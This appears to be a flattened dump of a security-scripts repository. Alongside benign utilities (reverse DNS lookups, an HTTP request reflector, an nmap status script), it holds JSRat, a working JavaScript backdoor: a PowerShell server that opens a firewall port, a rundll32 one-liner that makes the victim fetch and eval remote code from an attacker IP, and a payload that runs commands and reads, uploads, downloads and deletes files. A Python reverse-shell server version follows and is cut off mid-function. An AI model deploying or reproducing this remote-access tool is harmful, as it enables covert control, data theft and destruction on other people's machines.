-NewFileSystemLabel MyDrive -FileSystem NTFS -Confirm:$false 32 | #calc 33 | 34 | # Execute process if drive matches specified condition(s) 35 | #if ($driveLetter -eq 'Z:' -and $driveLabel -eq 'Mirror') 36 | #{ 37 | # write-host (get-date -format s) " Starting task in 3 seconds..." 38 | # start-sleep -seconds 3 39 | # start-process "Z:\sync.bat" 40 | #} 41 | } 42 | Remove-Event -SourceIdentifier volumeChange -ErrorAction SilentlyContinue 43 | } while (1-eq1) #Loop until next event 44 | Unregister-Event -SourceIdentifier volumeChange -ErrorAction SilentlyContinue -------------------------------------------------------------------------------- /generate-ssl-cert-key.txt: -------------------------------------------------------------------------------- 1 | openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 2 | -------------------------------------------------------------------------------- /host-ip.ps1: -------------------------------------------------------------------------------- 1 | # The following line read a plain list of IPs from files. For this demo, I have 2 | # this line commented out and added a line to just define an array of IPs here 3 | 4 | $listofIPs = Get-Content ip-list.txt 5 | 6 | #$listofIPs = "8.8.8.8","8.8.4.4","10.0.0.2","192.168.2.1" 7 | 8 | #Lets create a blank array for the resolved names 9 | $ResultList = @() 10 | 11 | # Lets resolve each of these addresses 12 | foreach ($ip in $listofIPs) 13 | { 14 | $result = $null 15 | 16 | $currentEAP = $ErrorActionPreference 17 | $ErrorActionPreference = "silentlycontinue" 18 | 19 | #Use the DNS Static .Net class for the reverse lookup 20 | # details on this method found here: http://msdn.microsoft.com/en-us/library/ms143997.aspx 21 | $result = [System.Net.Dns]::gethostentry($ip) 22 | 23 | $ErrorActionPreference = $currentEAP 24 | 25 | If ($Result) 26 | { 27 | $hostname = [string]$Result.AddressList.IPAddressToString #HostName 28 | $Resultlist += "$IP,$HOSTNAME" 29 | $temp = "$IP,$HOSTNAME" 30 | $temp 31 | } 32 | Else 33 | { 34 | $Resultlist += "$IP,No Hostname found" 35 | $temp = "$IP,No Hostname found" 36 | $temp 37 | } 38 | } 39 | 40 | # If we wanted to output the results to a text file we could do this, for this 41 | # demo I have this line commented and another line here to echo the results to the screen 42 | 43 | $resultlist | Out-File output.csv 44 | 45 | $ResultList 46 | -------------------------------------------------------------------------------- /http-reflect.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Reflects the requests from HTTP methods GET, POST, PUT, and DELETE 3 | # Written by Nathan Hamiel (2010) 4 | # Script modified by @xploresec 5 | 6 | from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler 7 | from optparse import OptionParser 8 | import sys 9 | 10 | class RequestHandler(BaseHTTPRequestHandler): 11 | 12 | def do_GET(self): 13 | 14 | request_path = self.path 15 | 16 | print("\n----- Request Start ----->\n") 17 | print(request_path) 18 | print(self.headers) 19 | print("<----- Request End -----\n") 20 | 21 | self.send_response(200) 22 | self.send_header("Set-Cookie", "foo=bar") 23 | 24 | def do_POST(self): 25 | 26 | request_path = self.path 27 | 28 | print("\n----- Request Start ----->\n") 29 | print(request_path) 30 | 31 | request_headers = self.headers 32 | content_length = request_headers.getheaders('content-length') 33 | length = int(content_length[0]) if content_length else 0 34 | 35 | print(request_headers) 36 | print(self.rfile.read(length)) 37 | print("<----- Request End -----\n") 38 | 39 | self.send_response(200) 40 | 41 | do_PUT = do_POST 42 | do_DELETE = do_GET 43 | 44 | def main(): 45 | if(len(sys.argv)!=3): 46 | print "Usage: "+sys.argv[0]+" " 47 | print "Example: "+sys.argv[0]+" 0.0.0.0 8080" 48 | sys.exit(0) 49 | my_ip = sys.argv[1] 50 | port = int(sys.argv[2]) 51 | print('Listening on %s:%s' % (my_ip,port)) 52 | server = HTTPServer((my_ip, port), RequestHandler) 53 | server.serve_forever() 54 | 55 | 56 | if __name__ == "__main__": 57 | parser = OptionParser() 58 | parser.usage = ("Creates an http-server that will echo out any GET or POST parameters\n" 59 | "Run:\n\n" 60 | " reflect") 61 | (options, args) = parser.parse_args() 62 | 63 | main() 64 | -------------------------------------------------------------------------------- /http-status.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local nmap = require "nmap" 3 | local shortport = require "shortport" 4 | local stdnse = require "stdnse" 5 | local table = require "table" 6 | 7 | description = [[ 8 | Performs a HEAD request for the root folder ("/") of a web server and displays the HTTP headers returned and saves the IP, Port and HTTP status code in RAWR CSV format. Modified from http-headers.nse script. 9 | ]] 10 | 11 | --- 12 | -- @output 13 | -- PORT STATE SERVICE 14 | -- 80/tcp open http 15 | -- | http-headers: 16 | -- | Date: Fri, 25 Jan 2013 17:39:08 GMT 17 | -- | Server: Apache/2.2.14 (Ubuntu) 18 | -- | Accept-Ranges: bytes 19 | -- | Vary: Accept-Encoding 20 | -- | Connection: close 21 | -- | Content-Type: text/html 22 | -- | 23 | -- |_ (Request type: HEAD) 24 | -- 25 | --@args path The path to request, such as /index.php. Default /. 26 | --@args useget Set to force GET requests instead of HEAD. 27 | 28 | author = "Ron Bowes" 29 | 30 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 31 | 32 | categories = {"discovery", "safe"} 33 | 34 | portrule = function( host, port ) 35 | return true 36 | end 37 | 38 | action = function(host, port) 39 | local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/" 40 | local useget = stdnse.get_script_args(SCRIPT_NAME..".useget") 41 | local request_type = "HEAD" 42 | local status = false 43 | local result 44 | 45 | -- Check if the user didn't want HEAD to be used 46 | if(useget == nil) then 47 | -- Try using HEAD first 48 | status, result = http.can_use_head(host, port, nil, path) 49 | end 50 | 51 | -- If head failed, try using GET 52 | if(status == false) then 53 | stdnse.debug1("HEAD request failed, falling back to GET") 54 | result = http.get(host, port, path) 55 | request_type = "GET" 56 | end 57 | 58 | if(result == nil) then 59 | if(nmap.debugging() > 0) then 60 | return "ERROR: Header request failed" 61 | else 62 | return nil 63 | end 64 | end 65 | 66 | if(result.rawheader == nil) then 67 | if(nmap.debugging() > 0) then 68 | return "ERROR: Header request didn't return a proper header" 69 | else 70 | return nil 71 | end 72 | end 73 | 74 | table.insert(result.rawheader, "(Request type: " .. request_type .. ")") 75 | local file = io.open("http-status-code.csv", "a") 76 | file:write(host.ip..","..port.number..","..result.status..",http,http\n") 77 | file:close() 78 | local file = io.open("https-status-code.csv", "a") 79 | file:write(host.ip..","..port.number..","..result.status..",http,ssl\n") 80 | file:close() 81 | return stdnse.format_output(true, result.rawheader) 82 | end 83 | -------------------------------------------------------------------------------- /ip-host.ps1: -------------------------------------------------------------------------------- 1 | # The following line read a plain list of IPs from files. For this demo, I have 2 | # this line commented out and added a line to just define an array of IPs here 3 | 4 | $listofIPs = Get-Content IPList.txt 5 | 6 | #$listofIPs = "8.8.8.8","8.8.4.4","10.0.0.2","192.168.2.1" 7 | 8 | #Lets create a blank array for the resolved names 9 | $ResultList = @() 10 | 11 | # Lets resolve each of these addresses 12 | foreach ($ip in $listofIPs) 13 | { 14 | $result = $null 15 | 16 | $currentEAP = $ErrorActionPreference 17 | $ErrorActionPreference = "silentlycontinue" 18 | 19 | #Use the DNS Static .Net class for the reverse lookup 20 | # details on this method found here: http://msdn.microsoft.com/en-us/library/ms143997.aspx 21 | $result = [System.Net.Dns]::gethostentry($ip) 22 | 23 | $ErrorActionPreference = $currentEAP 24 | 25 | If ($Result) 26 | { 27 | $hostname = [string]$Result.HostName 28 | $Resultlist += "$IP,$HOSTNAME" 29 | $temp = "$IP,$HOSTNAME" 30 | $temp 31 | } 32 | Else 33 | { 34 | $Resultlist += "$IP,No Hostname found" 35 | $temp = "$IP,No Hostname found" 36 | $temp 37 | } 38 | } 39 | 40 | # If we wanted to output the results to a text file we could do this, for this 41 | # demo I have this line commented and another line here to echo the results to the screen 42 | 43 | $resultlist | Out-File output.csv 44 | 45 | $ResultList -------------------------------------------------------------------------------- /ip2country.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import requests 3 | import sys 4 | 5 | if len(sys.argv)<=1: 6 | print "Usage: "+sys.argv[0]+" " 7 | 8 | f = open(sys.argv[1],"r") 9 | data = f.readlines() 10 | for ip in data: 11 | ip = (ip.replace("\r","")).replace("\n","") 12 | try: 13 | temp = requests.get("http://ip-api.com/csv/"+ip,timeout=120) 14 | resp = temp.content 15 | d = resp.split(",") 16 | print ip+","+d[1] 17 | except: 18 | print ip+","+"Failed" 19 | -------------------------------------------------------------------------------- /javascript-backdoor/JSRat.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | --- 3 | Learn from Casey Smith @subTee 4 | Author: 3gstudent 5 | --- 6 | Javascript Backdoor 7 | --- 8 | Server: 9 | run as admin: 10 | powershell.exe -ExecutionPolicy Bypass -File c:\test\JSRat.ps1 11 | 12 | Client: 13 | cmd line: 14 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.174.131/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} 15 | 16 | 17 | #> 18 | 19 | $Server = '192.168.174.131' #Listening IP. Change This. 20 | 21 | function Receive-Request 22 | { 23 | param 24 | ( 25 | $Request 26 | ) 27 | $output = "" 28 | $size = $Request.ContentLength64 + 1 29 | $buffer = New-Object byte[] $size 30 | do 31 | { 32 | $count = $Request.InputStream.Read($buffer, 0, $size) 33 | $output += $Request.ContentEncoding.GetString($buffer, 0, $count) 34 | } until($count -lt $size) 35 | $Request.InputStream.Close() 36 | write-host $output 37 | } 38 | 39 | $listener = New-Object System.Net.HttpListener 40 | $listener.Prefixes.Add('http://+:80/') 41 | 42 | netsh advfirewall firewall delete rule name="PoshRat 80" | Out-Null 43 | netsh advfirewall firewall add rule name="PoshRat 80" dir=in action=allow protocol=TCP localport=80 | Out-Null 44 | 45 | $listener.Start() 46 | 'Listening ...' 47 | while ($true) 48 | { 49 | $context = $listener.GetContext() # blocks until request is received 50 | $request = $context.Request 51 | $response = $context.Response 52 | $hostip = $request.RemoteEndPoint 53 | 54 | #Use this for One-Liner Start 55 | if ($request.Url -match '/connect$' -and ($request.HttpMethod -eq "GET")) 56 | { 57 | write-host "Usage:" -fore Green 58 | write-host " cmd: just input the cmd command" -fore Green 59 | write-host " delete file: input:delete,then set the file path" -fore Green 60 | write-host " exitbackdoor: input:exit" -fore Green 61 | write-host " read file: input:read,then set the file path" -fore Green 62 | write-host " run exe: input:run,then set the file path" -fore Green 63 | write-host " download file: input:download,then set the file path" -fore Green 64 | write-host " upload file: input:upload,then set the file path" -fore Green 65 | write-host "Host Connected" -fore Cyan 66 | $message = ' 67 | while(true) 68 | { 69 | h = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 70 | h.SetTimeouts(0, 0, 0, 0); 71 | 72 | try 73 | { 74 | h.Open("GET","http://'+$Server+'/rat",false); 75 | h.Send(); 76 | c = h.ResponseText; 77 | 78 | 79 | if(c=="delete") 80 | { 81 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 82 | p.SetTimeouts(0, 0, 0, 0); 83 | p.Open("POST","http://'+$Server+'/rat",false); 84 | p.Send("[Next Input should be the File to Delete]"); 85 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 86 | g.SetTimeouts(0, 0, 0, 0); 87 | g.Open("GET","http://'+$Server+'/rat",false); 88 | g.Send(); 89 | d = g.ResponseText; 90 | 91 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 92 | f =fso1.GetFile(d); 93 | f.Delete(); 94 | 95 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 96 | p.SetTimeouts(0, 0, 0, 0); 97 | p.Open("POST","http://'+$Server+'/rat",false); 98 | p.Send("[Delete Success]"); 99 | continue; 100 | } 101 | 102 | else if(c=="download") 103 | { 104 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 105 | p.SetTimeouts(0, 0, 0, 0); 106 | p.Open("POST","http://'+$Server+'/rat",false); 107 | p.Send("[Next Input should be the File to download]"); 108 | 109 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 110 | g.SetTimeouts(0, 0, 0, 0); 111 | g.Open("GET","http://'+$Server+'/rat",false); 112 | g.Send(); 113 | d = g.ResponseText; 114 | 115 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 116 | f=fso1.OpenTextFile(d,1); 117 | g=f.ReadAll(); 118 | f.Close(); 119 | 120 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 121 | p.SetTimeouts(0, 0, 0, 0); 122 | p.Open("POST","http://'+$Server+'/download",false); 123 | p.Send(g); 124 | continue; 125 | } 126 | 127 | else if(c=="exit") 128 | { 129 | c="(\"cmd /c taskkill /f /im rundll32.exe\",0,true)"; 130 | r = new ActiveXObject("WScript.Shell").Run(c); 131 | 132 | } 133 | 134 | else if(c=="read") 135 | { 136 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 137 | p.SetTimeouts(0, 0, 0, 0); 138 | p.Open("POST","http://'+$Server+'/rat",false); 139 | p.Send("[Next Input should be the File to Read]"); 140 | 141 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 142 | g.SetTimeouts(0, 0, 0, 0); 143 | g.Open("GET","http://'+$Server+'/rat",false); 144 | g.Send(); 145 | d = g.ResponseText; 146 | 147 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 148 | f=fso1.OpenTextFile(d,1); 149 | g=f.ReadAll(); 150 | f.Close(); 151 | 152 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 153 | p.SetTimeouts(0, 0, 0, 0); 154 | p.Open("POST","http://'+$Server+'/rat",false); 155 | p.Send(g); 156 | continue; 157 | } 158 | 159 | 160 | else if(c=="run") 161 | { 162 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 163 | p.SetTimeouts(0, 0, 0, 0); 164 | p.Open("POST","http://'+$Server+'/rat",false); 165 | p.Send("[Next Input should be the File to Run]"); 166 | 167 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 168 | g.SetTimeouts(0, 0, 0, 0); 169 | g.Open("GET","http://'+$Server+'/rat",false); 170 | g.Send(); 171 | d = g.ResponseText; 172 | 173 | r = new ActiveXObject("WScript.Shell").Run(d,0,true); 174 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 175 | p.SetTimeouts(0, 0, 0, 0); 176 | p.Open("POST","http://'+$Server+'/rat",false); 177 | p.Send("[Run Success]"); 178 | 179 | continue; 180 | } 181 | 182 | 183 | else if(c=="upload") 184 | { 185 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 186 | p.SetTimeouts(0, 0, 0, 0); 187 | p.Open("POST","http://'+$Server+'/rat",false); 188 | p.Send("[Start to Upload]"); 189 | 190 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 191 | g.SetTimeouts(0, 0, 0, 0); 192 | g.Open("GET","http://'+$Server+'/uploadpath",false); 193 | g.Send(); 194 | dpath = g.ResponseText; 195 | 196 | g2 = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 197 | g2.SetTimeouts(0, 0, 0, 0); 198 | g2.Open("GET","http://'+$Server+'/uploaddata",false); 199 | g2.Send(); 200 | ddata = g2.ResponseText; 201 | 202 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 203 | f=fso1.CreateTextFile(dpath,true); 204 | f.WriteLine(ddata); 205 | f.Close(); 206 | 207 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 208 | p.SetTimeouts(0, 0, 0, 0); 209 | p.Open("POST","http://'+$Server+'/rat",false); 210 | p.Send("[Upload Success]"); 211 | continue; 212 | } 213 | 214 | else 215 | { 216 | 217 | r = new ActiveXObject("WScript.Shell").Exec(c); 218 | var so; 219 | while(!r.StdOut.AtEndOfStream){so=r.StdOut.ReadAll()} 220 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 221 | p.Open("POST","http://'+$Server+'/rat",false); 222 | p.Send(so); 223 | } 224 | 225 | } 226 | catch(e1) 227 | { 228 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 229 | p.SetTimeouts(0, 0, 0, 0); 230 | p.Open("POST","http://'+$Server+'/rat",false); 231 | p.Send("[No Output]"); 232 | 233 | } 234 | 235 | } 236 | ' 237 | 238 | } 239 | 240 | if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "POST") ) 241 | { 242 | Receive-Request($request) 243 | } 244 | 245 | if ($request.Url -match '/download$' -and ($request.HttpMethod -eq "POST") ) 246 | { 247 | $output = "" 248 | $size = $Request.ContentLength64 + 1 249 | $buffer = New-Object byte[] $size 250 | do { 251 | $count = $Request.InputStream.Read($buffer, 0, $size) 252 | $output += $Request.ContentEncoding.GetString($buffer, 0, $count) 253 | } until($count -lt $size) 254 | $Request.InputStream.Close() 255 | 256 | write-host "Input the Path to Save:" -fore Red 257 | $message = Read-Host 258 | Set-Content $message -Value $output 259 | write-host "Save Success" -fore Red 260 | } 261 | 262 | if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "GET")) 263 | { 264 | $response.ContentType = 'text/plain' 265 | $message = Read-Host "JS $hostip>" 266 | } 267 | 268 | if($BoolExit -eq 1) 269 | { 270 | exit 271 | } 272 | $BoolExit=0 273 | 274 | if($message -eq "exit") 275 | { 276 | $BoolExit=1 277 | } 278 | 279 | 280 | 281 | if ($request.Url -match '/uploadpath$' -and ($request.HttpMethod -eq "GET") ) 282 | { 283 | write-host "Input the Path to upload:" -fore Red 284 | $UploadPath = Read-Host 285 | write-host "Input the Destination Path:" -fore Red 286 | $message = Read-Host 287 | } 288 | 289 | 290 | if ($request.Url -match '/uploaddata$' -and ($request.HttpMethod -eq "GET") ) 291 | { 292 | $message = Get-Content $UploadPath 293 | } 294 | 295 | [byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message) 296 | $response.ContentLength64 = $buffer.length 297 | $output = $response.OutputStream 298 | $output.Write($buffer, 0, $buffer.length) 299 | $output.Close() 300 | 301 | } 302 | 303 | $listener.Stop() 304 | -------------------------------------------------------------------------------- /javascript-backdoor/README.md: -------------------------------------------------------------------------------- 1 | #Javascript Backdoor 2 | 3 | http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html 4 | 5 | ##Victim machine 6 | 7 | ```rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.174.131/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}``` 8 | 9 | ##Attacker machine 10 | 11 | ```powershell.exe -ExecutionPolicy Bypass -File JSRat.ps1``` 12 | 13 | ##Important 14 | 15 | Update the IP address in JSRat.ps1 (line 19) and the command to be executed on victim machine. 16 | 17 | ##Python implementation 18 | 19 | https://github.com/Hood3dRob1n/JSRat-Py 20 | -------------------------------------------------------------------------------- /javascript-backdoor/py-jsrat.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/javascript-backdoor/py-jsrat.zip -------------------------------------------------------------------------------- /javascript-backdoor/py-jsrat/JSRat.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # JSRat Server - Python Implementation 4 | # By: Hood3dRob1n 5 | # 6 | """ 7 | Simple JS Reverse Shell over HTTP for Windows 8 | We run web server and then execute commands against the connecting Client/Victim 9 | 10 | Command to Launch JS Reverse Shell from Client||Victim Windows box: 11 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://10.10.10.10:31337/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} 12 | 13 | $(JSRat)> cmd /c dir C:\ 14 | 15 | References & Original Project: 16 | http://en.wooyun.io/2016/02/04/42.html 17 | http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html 18 | https://gist.github.com/subTee/f1603fa5c15d5f8825c0 19 | 20 | """ 21 | 22 | import optparse, os, socket, SocketServer, sys 23 | from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer 24 | from classes.colors import * 25 | import requests # Used for --find-ip option, otherwise not needed 26 | 27 | try: 28 | import readline 29 | except: 30 | error("No Python Readline"); 31 | pad(); bad("No history support as a result, sorry..."); 32 | 33 | 34 | def banner(): 35 | cls(); 36 | print red("\nJSRat Server") + white(" - ") + blue("Python ") + yellow("Implementation"); 37 | print blue("By") + white(": Hood3dRob1n"); 38 | 39 | 40 | def cls(): 41 | if os.name == 'nt' or sys.platform.startswith('win'): 42 | os.system('cls'); 43 | else: 44 | os.system('clear'); 45 | 46 | 47 | def internal_ip(): 48 | 'Check Internal IP' # Google IP address used... 49 | try: 50 | iip = [(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1] 51 | except: 52 | error("Problem resolving internal IP!") 53 | return "Problem resolving internal IP!" 54 | return iip 55 | 56 | 57 | def external_ip(): 58 | 'Check External IP using checkip.dyndns.org' 59 | url = 'http://checkip.dyndns.org/' # Simple External IP Check using dyndns... 60 | try: 61 | headers = { 'User-agent' : 'Python External IP Checker v0.01b' } 62 | res = requests.get( url, headers=headers, timeout=30.0 ) 63 | body = str( res.text ) 64 | extip = re.search('\d+\.\d+\.\d+\.\d+', body) 65 | except: 66 | error("Problem resolving extrernal IP!") 67 | return "Problem resolving extrernal IP!" 68 | return extip.group() 69 | 70 | 71 | def jsrat(): 72 | """ 73 | Build & Return the core JS code to operate JSRat on victim 74 | Essentially serve up additional JS to be evaluated by client based on need 75 | NOTE: Client must be using IE browser, or all bets are off - but you should know this already... 76 | """ 77 | jsrat_code = """ 78 | while(true) { 79 | h = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 80 | h.SetTimeouts(0, 0, 0, 0); 81 | try { 82 | h.Open("GET","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 83 | h.Send(); 84 | c = h.ResponseText; 85 | if(c=="delete") { 86 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 87 | p.SetTimeouts(0, 0, 0, 0); 88 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 89 | p.Send("[Next Input should be the File to Delete]"); 90 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 91 | g.SetTimeouts(0, 0, 0, 0); 92 | g.Open("GET","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 93 | g.Send(); 94 | d = g.ResponseText; 95 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 96 | f =fso1.GetFile(d); 97 | f.Delete(); 98 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 99 | p.SetTimeouts(0, 0, 0, 0); 100 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 101 | p.Send("[Delete Success]\\n"); 102 | continue; 103 | } else if(c=="download") { 104 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 105 | p.SetTimeouts(0, 0, 0, 0); 106 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 107 | p.Send("[Next Input should be the File to download]"); 108 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 109 | g.SetTimeouts(0, 0, 0, 0); 110 | g.Open("GET","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 111 | g.Send(); 112 | d = g.ResponseText; 113 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 114 | f=fso1.OpenTextFile(d,1); 115 | g=f.ReadAll(); 116 | f.Close(); 117 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 118 | p.SetTimeouts(0, 0, 0, 0); 119 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/download",false); 120 | p.Send(g); 121 | continue; 122 | } else if(c=="read") { 123 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 124 | p.SetTimeouts(0, 0, 0, 0); 125 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 126 | p.Send("[Next Input should be the File to Read]"); 127 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 128 | g.SetTimeouts(0, 0, 0, 0); 129 | g.Open("GET","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 130 | g.Send(); 131 | d = g.ResponseText; 132 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 133 | f=fso1.OpenTextFile(d,1); 134 | g=f.ReadAll(); 135 | f.Close(); 136 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 137 | p.SetTimeouts(0, 0, 0, 0); 138 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 139 | p.Send(g + "\\n"); 140 | continue; 141 | } else if(c=="run") { 142 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 143 | p.SetTimeouts(0, 0, 0, 0); 144 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 145 | p.Send("[Next Input should be the File to Run]"); 146 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 147 | g.SetTimeouts(0, 0, 0, 0); 148 | g.Open("GET","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 149 | g.Send(); 150 | d = g.ResponseText; 151 | r = new ActiveXObject("WScript.Shell").Run(d,0,true); 152 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 153 | p.SetTimeouts(0, 0, 0, 0); 154 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 155 | p.Send("[Run Success]\\n"); 156 | continue; 157 | } else if(c=="upload") { 158 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 159 | p.SetTimeouts(0, 0, 0, 0); 160 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 161 | p.Send("[Start to Upload]"); 162 | g = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 163 | g.SetTimeouts(0, 0, 0, 0); 164 | g.Open("GET","http://"""+bind_ip+":"+str(listener_port)+"""/uploadpath",false); 165 | g.Send(); 166 | dpath = g.ResponseText; 167 | g2 = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 168 | g2.SetTimeouts(0, 0, 0, 0); 169 | g2.Open("GET","http://"""+bind_ip+":"+str(listener_port)+"""/uploaddata",false); 170 | g2.Send(); 171 | ddata = g2.ResponseText; 172 | fso1=new ActiveXObject("Scripting.FileSystemObject"); 173 | f=fso1.CreateTextFile(dpath,true); 174 | f.WriteLine(ddata); 175 | f.Close(); 176 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 177 | p.SetTimeouts(0, 0, 0, 0); 178 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 179 | p.Send("[Upload Success]\\n"); 180 | continue; 181 | } else { 182 | r = new ActiveXObject("WScript.Shell").Exec(c); 183 | var so; 184 | while(!r.StdOut.AtEndOfStream){so=r.StdOut.ReadAll()} 185 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 186 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 187 | p.Send(so + "\\n"); 188 | } 189 | } catch(e1) { 190 | p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 191 | p.SetTimeouts(0, 0, 0, 0); 192 | p.Open("POST","http://"""+bind_ip+":"+str(listener_port)+"""/rat",false); 193 | p.Send("[ERROR - No Output]\\n"); 194 | } 195 | } 196 | """ 197 | return jsrat_code; 198 | 199 | 200 | def print_jsrat_help(): 201 | """ 202 | Displays JSRat options for Server operator to interact w/Client||Victim 203 | """ 204 | print 205 | print white(underline("JSRat Usage Options:")); 206 | print green(" CMD") + white(" => ") + green("Executes Provided Command"); 207 | print green(" run") + white(" => ") + green("Run EXE or Script"); 208 | print green(" read") + white(" => ") + green("Read File"); 209 | print green(" upload") + white(" => ") + green("Upload File"); 210 | print green(" download") + white(" => ") + green("Download File"); 211 | print green(" delete") + white(" => ") + green("Delete File"); 212 | print green(" help") + white(" => ") + green("Help Menu"); 213 | print green(" exit") + white(" => ") + green("Exit Shell"); 214 | print 215 | 216 | 217 | def get_user_input(): 218 | while True: 219 | usr_input = raw_input(red("$")+white("(")+blue("JSRat")+white(")")+red(">")+white(" ")); 220 | if usr_input.strip() != "": 221 | break 222 | else: 223 | print 224 | return usr_input.strip(); 225 | 226 | 227 | class myHandler(BaseHTTPRequestHandler): 228 | """ 229 | Custom handler so we can control how different web requests are processed 230 | Crude setup I threw together, but it works so get over it... 231 | """ 232 | js_load_path = '/connect' # Base URL path to initialize things (value is overridden at server start) 233 | upload_path = ""; # static so we can set/get as needed, since this isnt powershell... 234 | time_to_stop = False; 235 | 236 | def log_message(self, format, *args): 237 | """ Custom Log Handler to Spit out on to stderr """ 238 | return 239 | 240 | def do_GET(self): 241 | """ 242 | Handle any GET requests coming into our server 243 | """ 244 | content_type = "text/plain"; 245 | response_message = jsrat(); 246 | if self.js_load_path == self.path: 247 | good("Incoming JSRat Client: %s" % str(self.client_address[0])); 248 | if 'user-agent' in self.headers.keys() and self.headers['user-agent'].strip() != "": 249 | pad(); good("User-Agent: %s" % self.headers['User-Agent']) 250 | print_jsrat_help(); 251 | 252 | elif "/rat" == self.path: 253 | # Get input from server operator on what to do next... 254 | response_message = get_user_input(); 255 | if response_message.strip().lower() == "help": 256 | print_jsrat_help() 257 | while True: 258 | response_message = get_user_input(); 259 | if response_message.strip().lower() != "help": 260 | break 261 | else: 262 | print 